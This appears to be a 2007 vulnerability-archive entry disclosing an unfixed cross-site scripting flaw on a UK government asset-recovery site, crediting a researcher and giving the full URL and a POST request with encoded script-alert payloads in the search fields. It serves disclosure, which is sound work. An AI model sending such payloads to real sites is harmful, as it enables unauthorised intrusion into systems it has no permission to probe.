Security researcher x2Fusion submitted on 23/08/2007 a cross-site scripting (XSS) vulnerability affecting www.assetsrecovery.gov.uk, which at the time of submission ranked 1589977 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 23/08/2007
Date published: 23/08/2007
Status: UNFIXED
Author: x2Fusion
Domain: www.assetsrecovery.gov.uk
Category: XSS
Pagerank: 1589977
URL: http://www.assetsrecovery.gov.uk/ARAWeb/Templates/searchPage.aspx?NRMODE=Published&NRNODEGUID=%7bA85F8395-EC74-4CE7-AFBB-2251E8AD8772%7d&NRORIGINALURL=%2fSearch&NRCACHEHINT=Guest
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[base64 ViewState value omitted]&CESSearch1%3A_ctl0%3ACESSearch1__ctl0__ctl0=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&CESSearch1%3A_ctl1%3Asearch%3A_ctl1%3Aquery=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&CESSearch1%3A_ctl1%3Asearch%3A_ctl1%3Asearchbutton=Search&CESSearch1__ctl0_timezoneoffset=120